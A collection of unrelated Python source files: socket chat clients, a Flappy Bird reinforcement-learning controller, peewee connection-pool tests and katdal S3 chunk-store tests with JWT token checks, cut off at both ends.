"""Отправка сообщения"""
# Добавляем флаг конца сообщения (по-другому я не знаю как передавать больше 1024 и не разрывать соединение)
message += END_MESSAGE_FLAG
# Отправляем сообщение
self.sock.send(message.encode())
logger.info(f"Отправка данных серверу: '{message}'")
def input_processing(self):
"""Обработка ввода сообщений пользователя"""
while True:
msg = input()
# Если сообщение exit
if msg == "exit":
break
self.send_message(msg)
def __del__(self):
if self.sock:
self.sock.close()
logger.info("Разрыв соединения с сервером")
def main():
port_input = input("Введите номер порта сервера -> ")
port_flag = port_validation(port_input)
# Если некорректный ввод
if not port_flag:
port_input = DEFAULT_PORT
print(f"Выставили порт {port_input} по умолчанию")
ip_input = input("Введите ip-адрес сервера -> ")
ip_flag = ip_validation(ip_input)
# Если некорректный ввод
if not ip_flag:
ip_input = DEFAULT_IP
print(f"Выставили ip-адрес {ip_input} по умолчанию")
client = Client(ip_input, int(port_input))
if __name__ == "__main__":
main()
|
client_sent_recv.py
|
import socket
import sys
import threading
serverName = 'localhost'
serverPort = 21128
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientSocket.connect((serverName, serverPort))
print('连接服务器成功')
def runn():
while True:
sentence = input('')
clientSocket.send(sentence.encode("utf-8"))
background_thread = threading.Thread(target=runn)
background_thread.daemon = True
background_thread.start()
while True:
try:
message = clientSocket.recv(1024)
if not message:
print("End\n")
clientSocket.close()
sys.exit()
else:
print('From server: ' + message.decode('utf-8'), end='')
except KeyboardInterrupt:
print('Bye Server')
sys.exit()
|
controller.py
|
import time
import multiprocessing as mp
import numpy as np
import flappy
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.distributions import Bernoulli
import matplotlib.pyplot as plt
class Net(nn.Module):
# Define network parameters
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(72*100, 300)
self.fc2 = nn.Linear(300, 300)
self.fc3 = nn.Linear(300, 300)
self.fc4 = nn.Linear(300, 1)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.sigmoid(self.fc4(x)) # Finally returns probability of flapping
return x
def plot_durations(episode_durations, batch_size):
# Plot curve of median survival duration for each batch
# Adapted from http://pytorch.org/tutorials/intermediate/reinforcement_q_learning.html
plt.figure(2)
plt.clf()
plt.title('Training...')
plt.xlabel('Episode')
plt.ylabel('Duration')
plt.plot(episode_durations) # Plot individual episode durations
# Here we calculate the median of each batch, and plot them
num_batches = int(np.ceil(len(episode_durations)/batch_size))
batch_medians = []
for batch in range(num_batches):
batch_median = np.median(episode_durations[batch*batch_size:(batch+1)*batch_size])
batch_medians += [batch_median]*batch_size
plt.plot(batch_medians)
plt.yscale('log')
plt.pause(0.001) # Allow plot to update
def discount_rewards(r, gamma):
# This function performs discounting of rewards by going back
# and punishing or rewarding based upon final outcome of episode
disc_r = np.zeros_like(r, dtype=float)
running_sum = 0
for t in reversed(range(0, len(r))):
if r[t] == -1: # If the reward is -1...
running_sum = 0 # ...then reset sum, since it's a game boundary
running_sum = running_sum * gamma + r[t]
disc_r[t] = running_sum
# Here we normalise with respect to mean and standard deviation:
discounted_rewards = (disc_r - disc_r.mean()) / (disc_r.std() + np.finfo(float).eps)
# Note that we add eps in the rare case that the std is 0
return discounted_rewards
def preprocess(state):
# This function performs preprocessing on the state frame data
# Input: 288x512 matrix of integers
# Output: 72x100 matrix of floats
state = state[:, :400] # Crop lower part of screen below pipes
state = state[::4, ::4] # Downsample frame to 1/4 the size for efficiency
state = state.ravel().astype(float) # Convert to float (from int) and unravel from 2d->1d
state -= state.mean() # Normalise by subtracting mean and dividing by std
state /= state.std() + np.finfo(float).eps # Note that here I add eps in case std is 0
return torch.from_numpy(state).float() # Return state in format required by PyTorch
def main(num_batches=10000):
# Notes:
# 'state' is a 2d array containing a 288x512 matrix of integers (the frames are rotated by PyGame)
# 'reward' is defined as:
# +1 for scoring a point (getting through a pipe)
# -1 for dying
# 'done' is True upon dying, signifying the end of the episode
# Define parameters:
batch_size = 25 # Number of episodes to run before updating net parameters
learning_rate = 1e-4 # Learning rate used to scale gradient updates
gamma = 0.99 # Discount factor when accumulating future rewards
mode = 'train'
# Network initialisation:
agent = Net() # Define agent as an object of class Net (defined above)
opt = optim.Adam(agent.parameters(), lr=learning_rate)
# ^ Define optimiser as Adam with above defined learn rate.
# Define queues for sending/receiving data from game:
input_queue = mp.Queue()
output_queue = mp.Queue()
# Start game on a separate process:
p = mp.Process(target=flappy.main, args=(input_queue, output_queue, mode))
p.start()
# Initialise storage variables and counters:
episode_durations = [] # This variable is used for plotting only
batch_log_prob, batch_rewards = [], [] # These variables are used for calculating loss
batch_final_rewards = [] # This variable is used for deciding when to save
best_batch_median = 0 # Variable to determine best model so far, for saving
st = time.time()
for batch in range(num_batches):
for episode in range(batch_size): # Start episode at 1 for easier batch management with % later
input_queue.put(True) # This starts next episode
output_queue.get() # Gets blank response to confirm episode started
input_queue.put(False) # Input initial action as no flap
state, reward, done = output_queue.get() # Get initial state
episode_steps = 0 # Number of steps taken in current episode
episode_reward = 0 # Amount of reward obtained from current episode
while not done:
state = preprocess(state) # Preprocess the raw state data for usage with agent
flap_probability = agent(state) # Forward pass state through network to get flap probability
prob_dist = Bernoulli(flap_probability) # Generate Bernoulli distribution with given probability
action = prob_dist.sample() # Sample action from probability distribution
log_prob = prob_dist.log_prob(action) # Store log probability of action
if action == 1:
input_queue.put(True) # If action is 1, input True
else:
input_queue.put(False) # Otherwise, False
state, reward, done = output_queue.get() # Get resulting state and reward from above action
batch_log_prob.append(log_prob) # Store the log probability for loss calculation
batch_rewards.append(reward) # Store the reward obtained as a result of action
episode_reward += reward # Increase current episode's reward counter
episode_steps += 1 # Increase number of steps taken on current episode
batch_final_rewards.append(episode_reward)
episode_durations.append(episode_steps) # Include current episode's step count for plot
print('Batch {}, Episode {} || Reward: {:.1f} || Steps: {} '.format(batch, episode, episode_reward, episode_steps))
input_queue.put(True) # Reset the game.
#Once batch of rollouts is complete:
plot_durations(episode_durations, batch_size) # Update plot to include current batch
discounted_rewards = discount_rewards(batch_rewards, gamma) # Discount rewards with discount factor gamma
opt.zero_grad() # Zero gradients to clear existing data
for i in range(len(batch_log_prob)):
loss = -batch_log_prob[i]*discounted_rewards[i] # Calculate negative log likelihood loss, scaled by reward
loss.backward() # Backpropagate to calculate gradients
print('Updating network weights.')
opt.step() # Update network weights using above accumulated gradients
batch_median = np.median(batch_final_rewards)
# If current model has best median performance, save:
if batch_median > best_batch_median:
print('New best batch median {} (previously {}), saving network weights.'.format(batch_median, best_batch_median))
best_batch_median = batch_median
state = {
'state_dict': agent.state_dict(),
'optimizer': opt.state_dict(),
}
torch.save(state, 'model/trained-model.pt')
# Load using:
# state = torch.load(filepath)
# agent.load_state_dict(state['state_dict']), opt.load_state_dict(state['optimizer'])
else:
print('Batch Median Reward: {}'.format(batch_median))
print('Batch Size: {}, Time Taken: {:.2f}s'.format(batch_size,time.time()-st))
st = time.time()
batch_log_prob, batch_rewards = [], [] # Reset batch log probabilities and rewards
batch_final_rewards = [] # Reset end reward for each episode in batch
p.terminate() # Once all episodes are finished, terminate the process.
if __name__ == "__main__":
main()
|
pool.py
|
import heapq
import os
import threading
import time
from peewee import *
from peewee import _savepoint
from peewee import _transaction
from playhouse.pool import *
from .base import BaseTestCase
from .base import ModelTestCase
from .base_models import Register
class FakeTransaction(_transaction):
def _add_history(self, message):
self.db.transaction_history.append(
'%s%s' % (message, self._conn))
def __enter__(self):
self._conn = self.db.connection()
self._add_history('O')
self.db.push_transaction(self)
def __exit__(self, *args):
self._add_history('X')
self.db.pop_transaction()
class FakeDatabase(SqliteDatabase):
def __init__(self, *args, **kwargs):
self.counter = self.closed_counter = 0
self.transaction_history = []
super(FakeDatabase, self).__init__(*args, **kwargs)
def _connect(self):
self.counter += 1
return self.counter
def _close(self, conn):
self.closed_counter += 1
def transaction(self):
return FakeTransaction(self)
class FakePooledDatabase(PooledDatabase, FakeDatabase):
def __init__(self, *args, **kwargs):
super(FakePooledDatabase, self).__init__(*args, **kwargs)
self.conn_key = lambda conn: conn
class PooledTestDatabase(PooledDatabase, SqliteDatabase):
pass
class TestPooledDatabase(BaseTestCase):
def setUp(self):
super(TestPooledDatabase, self).setUp()
self.db = FakePooledDatabase('testing')
def test_connection_pool(self):
self.assertEqual(self.db.connection(), 1)
self.assertEqual(self.db.connection(), 1)
self.db.close()
self.db.connect()
self.assertEqual(self.db.connection(), 1)
def test_reuse_connection(self):
self.assertEqual(self.db.connection(), 1)
self.assertRaises(OperationalError, self.db.connect)
self.assertFalse(self.db.connect(reuse_if_open=True))
self.assertEqual(self.db.connection(), 1)
self.db.close()
self.db.connect()
self.assertEqual(self.db.connection(), 1)
def test_concurrent_connections(self):
db = FakePooledDatabase('testing')
signal = threading.Event()
def open_conn():
db.connect()
signal.wait()
db.close()
# Simulate 5 concurrent connections.
threads = [threading.Thread(target=open_conn) for i in range(5)]
for thread in threads:
thread.start()
# Wait for all connections to be opened.
while db.counter < 5:
time.sleep(.01)
# Signal threads to close connections and join threads.
signal.set()
for t in threads: t.join()
self.assertEqual(db.counter, 5)
self.assertEqual(
sorted([conn for _, conn in db._connections]),
[1, 2, 3, 4, 5]) # All 5 are ready to be re-used.
self.assertEqual(db._in_use, {})
def test_max_conns(self):
for i in range(self.db._max_connections):
self.db._state.closed = True # Hack to make it appear closed.
self.db.connect()
self.assertEqual(self.db.connection(), i + 1)
self.db._state.closed = True
self.assertRaises(ValueError, self.db.connect)
def test_stale_timeout(self):
# Create a test database with a very short stale timeout.
db = FakePooledDatabase('testing', stale_timeout=.001)
self.assertEqual(db.connection(), 1)
self.assertTrue(1 in db._in_use)
# Sleep long enough for the connection to be considered stale.
time.sleep(.001)
# When we close, since the conn is stale it won't be returned to
# the pool.
db.close()
self.assertEqual(db._in_use, {})
self.assertEqual(db._connections, [])
self.assertEqual(db._closed, set())
# A new connection will be returned.
self.assertEqual(db.connection(), 2)
def test_stale_on_checkout(self):
# Create a test database with a very short stale timeout.
db = FakePooledDatabase('testing', stale_timeout=.005)
self.assertEqual(db.connection(), 1)
self.assertTrue(1 in db._in_use)
# When we close, the conn should not be stale so it won't return to
# the pool.
db.close()
assert len(db._connections) == 1, 'Test runner too slow!'
# Sleep long enough for the connection to be considered stale.
time.sleep(.005)
self.assertEqual(db._in_use, {})
self.assertEqual(len(db._connections), 1)
# A new connection will be returned, as the original one is stale.
# The stale connection (1) will be removed and not placed in the
# "closed" set.
self.assertEqual(db.connection(), 2)
self.assertEqual(db._closed, set())
def test_manual_close(self):
self.assertEqual(self.db.connection(), 1)
self.db.manual_close()
# When we manually close a connection that's not yet stale, we add it
# back to the queue (because close() calls _close()), then close it
# for real, and mark it with a tombstone. The next time it's checked
# out, it will simply be removed and skipped over.
self.assertEqual(self.db._closed, set([1]))
self.assertEqual(len(self.db._connections), 1)
self.assertEqual(self.db._in_use, {})
self.assertEqual(self.db.connection(), 2)
self.assertEqual(self.db._closed, set())
self.assertEqual(len(self.db._connections), 0)
self.assertEqual(list(self.db._in_use.keys()), [2])
self.db.close()
self.assertEqual(self.db.connection(), 2)
def test_stale_timeout_cascade(self):
now = time.time()
db = FakePooledDatabase('testing', stale_timeout=10)
conns = [
(now - 20, 1),
(now - 15, 2),
(now - 5, 3),
(now, 4),
]
for ts_conn in conns:
heapq.heappush(db._connections, ts_conn)
self.assertEqual(db.connection(), 3)
self.assertEqual(db._in_use, {3: now - 5})
self.assertEqual(db._connections, [(now, 4)])
def test_connect_cascade(self):
now = time.time()
db = FakePooledDatabase('testing', stale_timeout=10)
conns = [
(now - 15, 1), # Skipped due to being stale.
(now - 5, 2), # In the 'closed' set.
(now - 3, 3),
(now, 4), # In the 'closed' set.
]
db._closed.add(2)
db._closed.add(4)
db.counter = 4 # The next connection we create will have id=5.
for ts_conn in conns:
heapq.heappush(db._connections, ts_conn)
# Conn 3 is not stale or closed, so we will get it.
self.assertEqual(db.connection(), 3)
self.assertEqual(db._in_use, {3: now - 3})
self.assertEqual(db._connections, [(now, 4)])
# Since conn 4 is closed, we will open a new conn.
db._state.closed = True # Pretend we're in a different thread.
db.connect()
self.assertEqual(db.connection(), 5)
self.assertEqual(sorted(db._in_use.keys()), [3, 5])
self.assertEqual(db._connections, [])
def test_db_context(self):
self.assertEqual(self.db.connection(), 1)
with self.db:
self.assertEqual(self.db.connection(), 1)
self.assertEqual(self.db.transaction_history, ['O1'])
self.assertEqual(self.db.connection(), 1)
self.assertEqual(self.db.transaction_history, ['O1', 'X1'])
with self.db:
self.assertEqual(self.db.connection(), 1)
self.assertEqual(len(self.db._connections), 1)
self.assertEqual(len(self.db._in_use), 0)
def test_db_context_threads(self):
signal = threading.Event()
def create_context():
with self.db:
signal.wait()
threads = [threading.Thread(target=create_context) for i in range(5)]
for thread in threads: thread.start()
while len(self.db.transaction_history) < 5:
time.sleep(.001)
signal.set()
for thread in threads: thread.join()
self.assertEqual(self.db.counter, 5)
self.assertEqual(len(self.db._connections), 5)
self.assertEqual(len(self.db._in_use), 0)
class TestLivePooledDatabase(ModelTestCase):
database = PooledTestDatabase('test_pooled.db')
requires = [Register]
def tearDown(self):
super(TestLivePooledDatabase, self).tearDown()
self.database.close_all()
if os.path.exists('test_pooled.db'):
os.unlink('test_pooled.db')
def test_reuse_connection(self):
for i in range(5):
Register.create(value=i)
conn_id = id(self.database.connection())
self.database.close()
for i in range(5, 10):
Register.create(value=i)
self.assertEqual(id(self.database.connection()), conn_id)
self.assertEqual(
[x.value for x in Register.select().order_by(Register.id)],
list(range(10)))
def test_db_context(self):
with self.database:
Register.create(value=1)
with self.database.atomic() as sp:
self.assertTrue(isinstance(sp, _savepoint))
Register.create(value=2)
sp.rollback()
with self.database.atomic() as sp:
self.assertTrue(isinstance(sp, _savepoint))
Register.create(value=3)
with self.database:
values = [r.value for r in Register.select().order_by(Register.id)]
self.assertEqual(values, [1, 3])
def test_bad_connection(self):
self.database.connection()
try:
self.database.execute_sql('select 1/0')
except Exception as exc:
pass
self.database.close()
self.database.connect()
|
test_chunkstore_s3.py
|
################################################################################
# Copyright (c) 2017-2019, National Research Foundation (Square Kilometre Array)
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use
# this file except in compliance with the License. You may obtain a copy
# of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
"""Tests for :py:mod:`katdal.chunkstore_s3`.
The tests require `minio`_ to be installed on the :envvar:`PATH`. If not found,
the test will be skipped.
Versions of minio prior to 2018-08-25T01:56:38Z contain a `race condition`_
that can cause it to crash when queried at the wrong point during startup. If
an older version is detected, the test will be skipped.
.. _minio: https://github.com/minio/minio
.. _race condition: https://github.com/minio/minio/issues/6324
"""
import os
import tempfile
import shutil
import threading
import time
import socket
import http.server
import urllib.parse
import contextlib
import io
import os
import warnings
import re
import pathlib
from urllib3.util.retry import Retry
import numpy as np
from numpy.testing import assert_array_equal
from nose import SkipTest
from nose.tools import assert_raises, assert_equal, assert_in, assert_not_in, timed
import requests
import jwt
import katsdptelstate
from katsdptelstate.rdb_writer import RDBWriter
from katdal.chunkstore_s3 import (S3ChunkStore, _AWSAuth, read_array,
decode_jwt, InvalidToken, TruncatedRead,
_DEFAULT_SERVER_GLITCHES)
from katdal.chunkstore import StoreUnavailable, ChunkNotFound
from katdal.test.test_chunkstore import ChunkStoreTestBase
from katdal.test.s3_utils import S3User, S3Server, MissingProgram
from katdal.datasources import TelstateDataSource
from katdal.test.test_datasources import make_fake_data_source, assert_telstate_data_source_equal
# Use a standard bucket for most tests to ensure valid bucket name (regex '^[0-9a-z.-]{3,63}$')
BUCKET = 'katdal-unittest'
# Also authorise this prefix for tests that will make their own buckets
PREFIX = '1234567890'
# Pick quick but different timeouts and retries for unit tests:
# - The effective connect timeout is 5.0 (initial) + 5.0 (1 retry) = 10 seconds
# - The effective read timeout is 0.4 + 0.4 = 0.8 seconds
# - The effective status timeout is 0.1 * (0 + 2 + 4) = 0.6 seconds, or
# 4 * 0.1 + 0.6 = 1.0 second if the suggestions use SUGGESTED_STATUS_DELAY
TIMEOUT = (5.0, 0.4)
RETRY = Retry(connect=1, read=1, status=3, backoff_factor=0.1,
raise_on_status=False, status_forcelist=_DEFAULT_SERVER_GLITCHES)
SUGGESTED_STATUS_DELAY = 0.1
READ_PAUSE = 0.1
@contextlib.contextmanager
def get_free_port(host):
"""Get an unused port number.
This is a context manager that returns a port, while holding open the
socket bound to it. This prevents another ephemeral process from
obtaining the port in the meantime. The target process should bind the
port with SO_REUSEPORT, after which the context should be exited to close
the temporary socket.
"""
with contextlib.closing(socket.socket()) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sock.bind((host, 0))
port = sock.getsockname()[1]
yield port
class TestReadArray:
def _test(self, array):
fp = io.BytesIO()
np.save(fp, array)
fp.seek(0)
out = read_array(fp)
np.testing.assert_equal(array, out)
# Check that Fortran order was preserved
assert_equal(array.strides, out.strides)
def testSimple(self):
self._test(np.arange(20))
def testMultiDim(self):
self._test(np.arange(20).reshape(4, 5, 1))
def testFortran(self):
self._test(np.arange(20).reshape(4, 5, 1).T)
def testV2(self):
# Make dtype that needs more than 64K to store, forcing .npy version 2.0
dtype = np.dtype([('a' * 70000, np.float32), ('b', np.float32)])
with warnings.catch_warnings():
# Suppress warning that V2 files can only be read by numpy >= 1.9
warnings.simplefilter('ignore', category=UserWarning)
self._test(np.zeros(100, dtype))
def testBadVersion(self):
data = b'\x93NUMPY\x03\x04' # Version 3.4
fp = io.BytesIO(data)
with assert_raises(ValueError):
read_array(fp)
def testPickled(self):
array = np.array([str, object])
fp = io.BytesIO()
np.save(fp, array)
fp.seek(0)
with assert_raises(ValueError):
read_array(fp)
def _truncate_and_fail_to_read(self, *args):
fp = io.BytesIO()
np.save(fp, np.arange(20))
fp.seek(*args)
fp.truncate()
fp.seek(0)
with assert_raises(TruncatedRead):
read_array(fp)
def testShort(self):
# Chop off everything past first byte (in magic part of bytes)
self._truncate_and_fail_to_read(1)
# Chop off everything past byte 20 (in header part of bytes)
self._truncate_and_fail_to_read(20)
# Chop off last byte (in array part of bytes)
self._truncate_and_fail_to_read(-1, 2)
def encode_jwt(header, payload, signature=86 * 'x'):
"""Generate JWT token with encoded signature (dummy ES256 one by default)."""
# Don't specify algorithm='ES256' here since that needs cryptography package
# This generates an Unsecured JWS without a signature: '<header>.<payload>.'
header_payload = jwt.encode(payload, '', algorithm='none', headers=header)
# Now tack on a signature that nominally matches the header
return header_payload + signature
class TestTokenUtils:
"""Test token utility and validation functions."""
def test_jwt_broken_token(self):
header = {'alg': 'ES256', 'typ': 'JWT'}
payload = {'exp': 9234567890, 'iss': 'kat', 'prefix': ['123']}
token = encode_jwt(header, payload)
claims = decode_jwt(token)
assert_equal(payload, claims)
# Token has invalid characters
assert_raises(InvalidToken, decode_jwt, '** bad token **')
# Token has invalid structure
assert_raises(InvalidToken, decode_jwt, token.replace('.', ''))
# Token header failed to decode
assert_raises(InvalidToken, decode_jwt, token[1:])
# Token payload failed to decode
h, p, s = token.split('.')
assert_raises(InvalidToken, decode_jwt, '.'.join((h, p[:-1], s)))
# Token signature failed to decode or wrong length
assert_raises(InvalidToken, decode_jwt, token[:-1])
assert_raises(InvalidToken, decode_jwt, token[:-2])
assert_raises(InvalidToken, decode_jwt, token + token[-4:])
def test_jwt_expired_token(self):
header = {'alg': 'ES256', 'typ': 'JWT'}
payload = {'exp': 0, 'iss': 'kat', 'prefix': ['123']}
token = encode_jwt(header, payload)
assert_raises(InvalidToken, decode_jwt, token)
# Check that expiration time is not-too-large integer
payload['exp'] = 1.2
assert_raises(InvalidToken, decode_jwt, encode_jwt(header, payload))
payload['exp'] = 12345678901234567890
assert_raises(InvalidToken, decode_jwt, encode_jwt(header, payload))
# Check that it works without expiry date too
del payload['exp']
claims = decode_jwt(encode_jwt(header, payload))
assert_equal(payload, claims)
class TestS3ChunkStore(ChunkStoreTestBase):
"""Test S3 functionality against an actual (minio) S3 service."""
@classmethod
def start_minio(cls, host):
"""Start Fake S3 service on `host` and return its URL."""
try:
host = '127.0.0.1' # Unlike 'localhost', guarantees IPv4
with get_free_port(host) as port:
pass
# The port is now closed, which makes it available for minio to
# bind to. While MinIO on Linux is able to bind to the same port
# as the socket held open by get_free_port, Mac OS is not.
cls.minio = S3Server(host, port, pathlib.Path(cls.tempdir), S3User(*cls.credentials))
except MissingProgram as exc:
raise SkipTest(str(exc))
return cls.minio.url
@classmethod
def prepare_store_args(cls, url, **kwargs):
"""Prepare the arguments used to construct `S3ChunkStore`."""
kwargs.setdefault('timeout', TIMEOUT)
kwargs.setdefault('retries', RETRY)
kwargs.setdefault('credentials', cls.credentials)
return url, kwargs
@classmethod
def setup_class(cls):
"""Start minio service running on temp dir, and ChunkStore on that."""
cls.credentials = ('access*key', 'secret*key')
cls.tempdir = tempfile.mkdtemp()
cls.minio = None
try:
cls.s3_url = cls.start_minio('127.0.0.1')
cls.store_url, cls.store_kwargs = cls.prepare_store_args(cls.s3_url)
cls.store = S3ChunkStore(cls.store_url, **cls.store_kwargs)
# Ensure that pagination is tested
cls.store.list_max_keys = 3
except Exception:
cls.teardown_class()
raise
@classmethod
def teardown_class(cls):
if cls.minio:
cls.minio.close()
shutil.rmtree(cls.tempdir)
def setup(self):
# The server is a class-level fixture (for efficiency), so state can
# leak between tests. Prevent that by removing any existing objects.
# It's easier to do that by manipulating the filesystem directly than
# trying to use the S3 API.
data_dir = os.path.join(self.tempdir, 'data')
for entry in os.scandir(data_dir):
if not entry.name.startswith('.') and entry.is_dir():
shutil.rmtree(entry.path)
# Also get rid of the cache of verified buckets
self.store._verified_buckets.clear()
def array_name(self, name):
"""Ensure that bucket is authorised and has valid name."""
if name.startswith(PREFIX):
return name
return self.store.join(BUCKET, name)
def test_chunk_non_existent(self):
# An empty bucket will trigger StoreUnavailable so put something in there first
self.store.mark_complete(self.array_name('crumbs'))
return super().test_chunk_non_existent()
def test_public_read(self):
url, kwargs = self.prepare_store_args(self.s3_url, credentials=None)
reader = S3ChunkStore(url, **kwargs)
# Create a non-public-read array.
# This test deliberately doesn't use array_name so that it can create
# several different buckets.
slices = np.index_exp[0:5]
x = np.arange(5)
self.store.create_array('private/x')
self.store.put_chunk('private/x', slices, x)
# Ceph RGW returns 403 for missing chunks too so we see ChunkNotFound
# The ChunkNotFound then triggers a bucket list that raises StoreUnavailable
with assert_raises(StoreUnavailable):
reader.get_chunk('private/x', slices, x.dtype)
# Now a public-read array
url, kwargs = self.prepare_store_args(self.s3_url, public_read=True)
store = S3ChunkStore(url, **kwargs)
store.create_array('public/x')
store.put_chunk('public/x', slices, x)
y = reader.get_chunk('public/x', slices, x.dtype)
np.testing.assert_array_equal(x, y)
@timed(0.1 + 0.2)
def test_store_unavailable_unresponsive_server(self):
host = '127.0.0.1'
with get_free_port(host) as port:
url = f'http://{host}:{port}/'
store = S3ChunkStore(url, timeout=0.1, retries=0)
with assert_raises(StoreUnavailable):
store.is_complete('store_is_not_listening_on_that_port')
def test_token_without_https(self):
# Don't allow users to leak their tokens by accident
with assert_raises(StoreUnavailable):
S3ChunkStore('http://apparently.invalid/', token='secrettoken')
def test_mark_complete_top_level(self):
self._test_mark_complete(PREFIX + '-completetest')
def test_rdb_support(self):
telstate = katsdptelstate.TelescopeState()
view, cbid, sn, _, _ = make_fake_data_source(telstate, self.store, (5, 16, 40), PREFIX)
telstate['capture_block_id'] = cbid
telstate['stream_name'] = sn
# Save telstate to temp RDB file since RDBWriter needs a filename and not a handle
rdb_filename = f'{cbid}_{sn}.rdb'
temp_filename = os.path.join(self.tempdir, rdb_filename)
with RDBWriter(temp_filename) as rdbw:
rdbw.save(telstate)
# Read the file back in and upload it to S3
with open(temp_filename, mode='rb') as rdb_file:
rdb_data = rdb_file.read()
rdb_url = urllib.parse.urljoin(self.store_url, self.store.join(cbid, rdb_filename))
self.store.create_array(cbid)
self.store.complete_request('PUT', rdb_url, data=rdb_data)
# Check that data source can be constructed from URL (with auto chunk store)
source_from_url = TelstateDataSource.from_url(rdb_url, **self.store_kwargs)
source_direct = TelstateDataSource(view, cbid, sn, self.store)
assert_telstate_data_source_equal(source_from_url, source_direct)
def test_missing_or_empty_buckets(self):
slices = (slice(0, 1),)
dtype = np.dtype(np.float)
# Without create_array the bucket is missing
with assert_raises(StoreUnavailable):
self.store.get_chunk(f'{BUCKET}-missing/x', slices, dtype)
self.store.create_array(f'{BUCKET}-empty/x')
# Without put_chunk the bucket is empty
with assert_raises(StoreUnavailable):
self.store.get_chunk(f'{BUCKET}-empty/x', slices, dtype)
# Check that the standard bucket has not been verified yet
bucket_url = urllib.parse.urljoin(self.store._url, BUCKET)
assert_not_in(bucket_url, self.store._verified_buckets)
# Check that the standard bucket remains verified after initial check
self.test_chunk_non_existent()
assert_in(bucket_url, self.store._verified_buckets)
class _TokenHTTPProxyHandler(http.server.BaseHTTPRequestHandler):
"""HTTP proxy that substitutes AWS credentials in place of a bearer token."""
def __getattr__(self, name):
"""Handle all HTTP requests by the same method since this is a proxy."""
if name.startswith('do_'):
return self.do_all
return self.__getattribute__(name)
def do_all(self):
# See https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Connection
HOP_HEADERS = {
'keep-alive', 'transfer-encoding', 'te', 'connection', 'trailer',
'upgrade', 'proxy-authorization', 'proxy-authenticate'
}
self.protocol_version = 'HTTP/1.1'
data_len = int(self.headers.get('Content-Length', 0))
data = self.rfile.read(data_len)
truncate = False
pause = 0.0
glitch_location = 0
# Extract a proxy suggestion prepended to the path
suggestion = re.search(r'/please-([^/]+?)(?:-for-([\d\.]+)-seconds)?/',
self.path)
if suggestion:
# Check when this exact request (including suggestion) was first made
key = self.requestline
initial_time = self.server.initial_request_time.setdefault(key, time.time())
# Remove suggestion from path
start, end = suggestion.span()
self.path = self.path[:start] + '/' + self.path[end:]
command, duration = suggestion.groups()
duration = float(duration) if duration else np.inf
# If the suggestion is still active, go ahead with it
if time.time() < initial_time + duration:
# Respond with the suggested status code for a while
respond_with = re.match(r'^respond-with-(\d+)$', command)
if respond_with:
status_code = int(respond_with.group(1))
time.sleep(SUGGESTED_STATUS_DELAY)
self.send_response(status_code, 'Suggested by unit test')
self.end_headers()
return
# Truncate or pause transmission of the payload after specified bytes
glitch = re.match(r'^(truncate|pause)-read-after-(\d+)-bytes$', command)
if glitch:
flavour = glitch.group(1)
truncate = (flavour == 'truncate')
pause = READ_PAUSE if flavour == 'pause' else 0.0
glitch_location = int(glitch.group(2))
else:
raise ValueError(f"Unknown command '{command}' "
f'in proxy suggestion {suggestion}')
else:
# We're done with this suggestion since its time ran out
del self.server.initial_request_time[key]
# Extract token, validate it and check if path is authorised by it
auth_header = self.headers.get('Authorization').split()
if len(auth_header) == 2 and auth_header[0] == 'Bearer':
token = auth_header[1]
else:
token = ''
try:
prefixes = decode_jwt(token).get('prefix', [])
except InvalidToken:
prefixes = []
if not any(self.path.lstrip('/').startswith(prefix) for prefix in prefixes):
self.send_response(401, f'Unauthorized (got: {self.path}, allowed: {prefixes})')
self.end_headers()
return
# Clear out hop-by-hop headers
request_headers = dict(self.headers.items())
for header in self.headers:
if header.lower() in HOP_HEADERS:
del request_headers[header]
url = urllib.parse.urljoin(self.server.target, self.path)
try:
with self.server.session.request(self.command, url,
headers=request_headers, data=data,
auth=self.server.auth,
allow_redirects=False,
timeout=5) as resp:
content = resp.content
status_code = resp.status_code
reason = resp.reason
headers = resp.headers.copy()
except requests.RequestException as e:
content = str(e).encode('utf-8')
status_code = 503
reason = 'Service unavailable'
headers = {
'Content-type': 'text/plain',
'Content-length': str(len(content))
}
self.send_response(status_code, reason)
for key, value in headers.items():
# The base class automatically sets Date and Server headers
if key.lower() not in HOP_HEADERS.union({'date', 'server'}):
self.send_header(key, value)
self.end_headers()
if pause:
self.wfile.write(content[:glitch_location])
# The wfile object should be an unbuffered _SocketWriter but flush anyway
self.wfile.flush()
time.sleep(pause)
self.wfile.write(content[glitch_location:])
else:
self.wfile.write(content[:glitch_location] if truncate else content)
def log_message(self, format, *args):
# Get time offset from first of these requests (useful for debugging)
# XXX Could also use args[0] instead of requestline, not sure which is best
key = self.requestline
now = time.time()
# Print 0.0 for a fresh suggestion and -1.0 for a stale / absent suggestion (no key found)
initial_time = self.server.initial_request_time.get(key, now + 1.0)
time_offset = now - initial_time
# Print to stdout instead of stderr so that it doesn't spew all over
# the screen in normal operation.
print(f"Token proxy: {self.log_date_time_string()} ({time_offset:.3f}) {format % args}")
class _TokenHTTPProxyServer(http.server.HTTPServer):
"""Server for use with :class:`_TokenHTTPProxyHandler`.
It sets SO_REUSEPORT so that it is compatible with a socket created by
:func:`get_free_port`, including on OS X.
"""
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
super().server_bind()
class TestS3ChunkStoreToken(TestS3ChunkStore):
"""Test S3 with token authentication headers."""
@classmethod
def setup_class(cls):
cls.proxy_url = None
cls.httpd = None
super().setup_class()
@classmethod
def teardown_class(cls):
if cls.httpd is not None:
cls.httpd.session.close()
cls.httpd.shutdown()
cls.httpd = None
cls.httpd_thread.join()
cls.httpd_thread = None
super().teardown_class()
@classmethod
def prepare_store_args(cls, url, **kwargs):
"""Prepare the arguments used to construct `S3ChunkStore`."""
if cls.httpd is None:
proxy_host = '127.0.0.1'
with get_free_port(proxy_host) as proxy_port:
